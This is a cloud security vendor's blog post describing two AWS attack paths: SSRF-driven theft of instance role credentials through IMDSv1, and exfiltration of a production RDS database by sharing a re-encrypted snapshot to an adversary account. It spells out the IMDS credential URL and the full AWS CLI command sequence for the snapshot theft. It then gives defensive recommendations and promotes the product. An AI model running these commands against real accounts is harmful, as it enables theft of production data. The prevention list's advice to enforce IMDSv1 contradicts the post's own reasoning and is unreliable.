Cloud environments are becoming increasingly complex and challenging to manage from a security standpoint. In a cloud-native application infrastructure, “workloads” are built by developers using code (infrastructure as code, or IaC) and controlled by DevOps using automated “pipelines.” The new infrastructure is constantly evolving, while the security implications of the environmental changes are often easy to neglect.

As a result, security admins find it challenging to answer basic questions when it comes to their cloud environments, such as:

Who are my powerful identities, human and non-human, and where do my overprivileged identities pose an immediate risk?
Which of my publicly-facing workloads are at the highest risk due to misconfigurations of services and privileges?
Which of my workload instances runs the unpatched OS and common libraries, and where does it matter the most?
Do the developers that create the environment (with IaC) create risky configurations they are unaware of?

As defenders, we are required to adopt the attacker’s perspective and uncover “toxic combinations” - the potential attack paths in a cloud environment. The more complex the environment, the harder it is to assess what are the “opportunities” presented to a potential adversary.

Identifying the attack paths and toxic combinations in the cloud environment are ever more challenging for the following reasons:

These are often a complex combination of misconfigurations of services, network exposure, mishandling of privileges and identities, and classic vulnerabilities in OS and applications.
They often involve deep knowledge of the bits and bytes of cloud services, such as KMS, S3, Metadata service, and the notorious IAM. Security organizations find this expertise is hard to come by.
Even the basics are hard to come by, such as identifying public assets, privileged identities, critical configurations, etc. Let alone identifying where they collide and combine into a toxic synergy.

Toxic combination leading to attack path:

As attack paths and toxic combinations are complex and multi-layered - so should be the security solution. Constantly monitoring all security aspects of the cloud, such as entitlements, IAM, configurations, and vulnerabilities is crucial. Having gained this visibility - the next step is to correlate all that knowledge into finding what an adversary could leverage to compromise the workloads and data. These paths should be highlighted and prioritized to the security admins and to the developers, along with crystal-clear remediation recommendations.

In this post, we will present two use cases, each one of them representing a complex attack path that a cloud account is exposed to.

The first use case will focus on a complex scenario where network exposure, misconfigurations, and over privileges create a toxic synergy where the production S3 buckets may be compromised.
The second use case scenario will focus on an attack that utilizes all pure cloud services (RDS, KMS, and access keys) to leak an entire database by compromising stale access keys on a developer's desktop.

These use cases aim to demonstrate the level of complexity cloud attack paths have and how hard it is to identify that such a risk exists. We will follow with some immediate security measures to address the threat in these use cases.

Key Points

In increasingly complicated cloud environments, it is incredibly hard to answer the basic security questions, such as:
- Who are my powerful identities, human and non-human?
- Where do my overprivileged identities pose an immediate risk?
- Which of my workload instances runs the unpatched OS and common libraries, and where does it matter most?
- Are there any cloud configurations that violates bad practice and expose the workload to an immediate risk?
Combination of what seems to be low-risk misconfigurations converge into a toxic combination and can pose an enormous risk
A security solution for cloud workloads should have all-around visibility of the risk sources from
- Permissions and entitlements
- Configurations
- Network
- OS vulnerabilities
The goal should be correlating and identifying where risk from different sources creates a toxic synergy scenario. Those can potentially present an immediate threat to the integrity of the data and the workload.

Use Cases

Public instance with high data leakage risk

Suppose there is an EC2 instance running a workload for a brand new cloud-native application. To expose web access, port 443 is defined as open to 0.0.0.0 in the security group along with a corresponding ACL and route rules.

The application is heavily utilizing S3 service, reading and writing to various buckets. Permissions to access the AWS resources are managed by assuming a role that is attached to the EC2 instance via instance profile. The temporary credentials of the role are accessible to the instance without authentication, via the Instance Metadata Service (IMDS), by accessing the following URL from within the instance.

URL:

169.254.169.254/latest/meta-data/iam/security-credentials/<role name>

The response will contain the temporary role’s keys

Response:

{

"Code" : "Success",

"LastUpdated" : "2012-04-26T16:39:16Z",

"Type" : "AWS-HMAC",

"AccessKeyId" : "....",

"SecretAccessKey" : "...",

"Token" : "token",

"Expiration" : "2022-05-17T15:09:54Z"

}

A cloud architect was unable to isolate specific actions the application would need, and attached a role with the AmazonS3FullAccess permission policy to the EC2 instance. As a result, rendering the instance as a full S3 admin.

AmazonS3FullAccess:

{

"Version": "2012-10-17",

"Statement": [

{

"Effect": "Allow",

"Action": [

"s3:*",

"s3-object-lambda:*"

"Resource": "*"

}

]

}

The architect was unaware of the risk—IMDS version 1 is enabled for the instance. Version 2 of the IMDS provides important protection for the temporary role credentials, from being leaked by an adversary that can get the server to access a URL of their choice (and return the results to them). Version 1 lacks these security controls. As a result, if an adversary finds an SSRF vulnerability on the web application, they could get full access to the role credentials. This can be achieved by tricking the server into accessing the metadata service URL and returning the response.

To sum it up:

EC2 instance open to the public on port 443
IMDSv1 enabled
Overprivileged role attached to the instance (S3 Admin)

Toxic combination leading to data compromise via public instance:

Each one of the above configurations on its own would expose the workload (the EC2 instance), and the cloud-native application to risk. However, all 3 risky configurations combined result in a far greater risk. Once an SSRF vulnerability is found on the instance, an adversary could obtain full access to all the S3 buckets of the account, that often contain highly-sensitive data.

At this point, an attacker could leak the data, delete the data, or encrypt the data and extort the cloud-native application owner using a ransomware attack.

What would posture control do?

Zscaler Posture Control would identify a powerful role assigned to the EC2 instance. It would correlate the finding with the scan results of the image and with the public exposure of the instance (via security groups, ACLs and other cloud specific network controls) and mark it as critical since IMDSv1 is enabled on the instance.

Unused access keys can leak the entire production DB via snapshot sharing

Suppose there is a cloud application developer in charge of the availability and backups of a production RDS database used by the cloud-native application. As part of their job, they would need to simulate a restore of the database from a snapshot. For that, they ask DevOps to create an IAM user with access keys, with permission to manage RDS snapshots.

DevOps creates the IAM user with an access key and grants the IAM user with the appropriate permissions to manage RDS snapshots.

After successfully testing the database recovery, the developer would end up with an unused access key lying stale in his workstation. As is the case with access keys, no modern controls can be applied to protect the authentication (such as multi-factor authentication).

If the workstation is compromised, an adversary could get a hold of the IAM access key and leverage the IAM privileges to export the latest snapshot of the production database into an AWS account under the adversary’s control. This can be achieved by creating a snapshot of the database and sharing the snapshot with an AWS account owned by the adversary.

In order to copy the database to the adversary-controlled AWS account, the adversary will first create a DB snapshot, using AWS CLI:

aws rds create-db-snapshot

--db-snapshot-identifier prod-db-name

--db-instance-identifier snapshot-prod-db

As the snapshot is encrypted, they would need to create a copy of the encrypted snapshot with a KMS key that is under the control of the adversary. For that, they would first create a KMS key in the adversary account. The adversary would execute this command in their own AWS account:

aws kms create-key --policy file://key-policy.json

The policy file would contain the following json document. This policy allows the victim account full access to the adversary’s KMS key.

key-policy.json:

{

"Version": "2012-10-17",

"Id": "allow-victim-account",

"Statement": [

{

"Sid": "Enable IAM User Permissions",

"Effect": "Allow",

"Principal": {

"AWS": "<ARN of root user of victim account>"

"Action": "kms:*",

"Resource": "*"

}

]

}

The response will contain the ARN of the adversary’s controlled KMS key. Once that is done, they can create a copy of the snapshot that is encrypted with the KMS key under his control

aws rds copy-db-snapshot

--source-db-snapshot-identifier snapshot-prod-db

--target-db-snapshot-identifier snapshot-prod-db-copy-to-be-leaked

--kms-key-id <ARN of the KMS key from the adversary account>

The final step is to share the snapshot with the adversary account:

aws rds modify-db-snapshot-attribute

--db-snapshot-identifier snapshot-prod-db-copy-to-be-leaked

--attribute-name restore

--values-to-add {"<AWS Account ID of Adversary account>"}

Once the RDS snapshot is shared with the adversary account, encrypted with a KMS key controlled by the adversary can recreate the entire database in their own account.

To sum it up:

Access key created for DB restore
Access key left unused
Security admin unaware of a huge exposure
The key can be used to leak the entire production DB to a third party

Timeline for RDS snapshot compromise:

What would posture control do?

Zscaler Posture Control would identify risky data access (to the RDS snapshots) enabled by the access keys. It would also correlate with usage information and highlight the risk of unused access keys as critical.

Security Recommendations and Prevention

In this section, we will highlight some of the immediate prevention steps a security admin could take to mitigate the threat described in the use cases above. These best practices are built in and available as part of Zscaler Posture Control.

Public instance with high data leakage risk - prevention

Enforce the use of IMDSv1 - especially for publicly-facing instances
Never assign any admin roles to publicly-facing instances
Assign permissions to human and non-human identities following the principle of least privilege
Ensure your workload is built with up-to-date images and libraries. Optimally with a shift-left approach where vulnerabilities are discovered in build-time

Unused access keys can leak the entire production DB via snapshot sharing - prevention

Avoid using IAM users as much as possible. Use instead SSO identities either from your on-prem identity provider or use AWS SSO
Periodically, remove all unused access keys
Using cloud trail, security admin should monitor any manual creation of RDS snapshots and API calls that can be used for sharing those snapshots
The following API calls should be considered highly sensitive and should be monitored
- CreateDBSnapshot
- CopyDBSnapshot
- ModifyDBSnapshotAttribute
The rds: ModifyDBSnapshotAttribute action is used to share a snapshot with other AWS accounts. This action should be explicitly denied when not required, either by attaching a deny policy, or utilizing a service control policy in an AWS Organizations environment

Better Security Approach with a Single Integrated Platform

Data breaches, vulnerabilities, and security violations continue to rise. As a result, enterprises undergoing digital transformation or building new cloud apps must streamline security processes. In order to avoid the high cost of remediating security and compliance violations or application vulnerabilities in production—or worse, recovering from a breach—it is beneficial to proactively identify and remediate security weaknesses and vulnerabilities. A unified, cloud-native security platform like Zscaler Posture Control is designed to identify, prioritize, and remediate the most critical cloud security risks. Zscaler Posture Control serves as a single source of truth across the cloud infrastructure, gathering telemetry from all environments and correlating risk and threat data to give better risk insights and maximize the effectiveness of the security team.

Learn more about Zscaler Posture Control security capabilities.